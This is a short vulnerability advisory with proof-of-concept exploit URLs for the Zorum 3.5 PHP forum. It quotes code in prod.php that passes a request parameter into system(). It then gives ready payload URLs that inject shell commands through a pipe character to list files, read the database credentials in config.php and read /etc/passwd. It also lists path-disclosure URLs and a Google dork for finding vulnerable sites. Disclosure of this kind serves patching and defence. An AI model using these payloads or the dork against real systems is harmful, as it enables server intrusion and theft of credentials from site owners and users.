Zorum 3.5 remote code execution poc exploit software: description: Zorum is a freely available, open source Web-based forum application implemented in PHP. It is available for UNIX, Linux, and any other platform that supports PHP script execution. author site: http://zorum.phpoutsourcing.com/ 1) remote code execution: vulnerable code, in /gorum/prod.php file: 07 $doubleApp = isset($argv[1]); … 14 if( $doubleApp ) 15 { 16 $appDir = $argv[1]; 17 system(”mkdir $prodDir/$appDir”); … a user can execute arbitrary commands using pipe char, example: http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-la to list directories http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.php to see database username/password… http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwd to see /etc/passwd file 2) path disclosure: http://[target]/zorum/gorum/notification.php http://[target]/zorum/user.php http://[target]/zorum/attach.php http://[target]/zorum/blacklist.php http://[target]/zorum/forum.php http://[target]/zorum/globalstat.php http://[target]/zorum/gorum/trace.php http://[target]/zorum/gorum/badwords.php http://[target]/zorum/gorum/flood.php and so on… googledork: “Powered by Zorum 3.5″ rgod site: http://rgod.altervista.org mail: retrogod at aliceposta it original advisory: http://rgod.altervista.org/zorum.html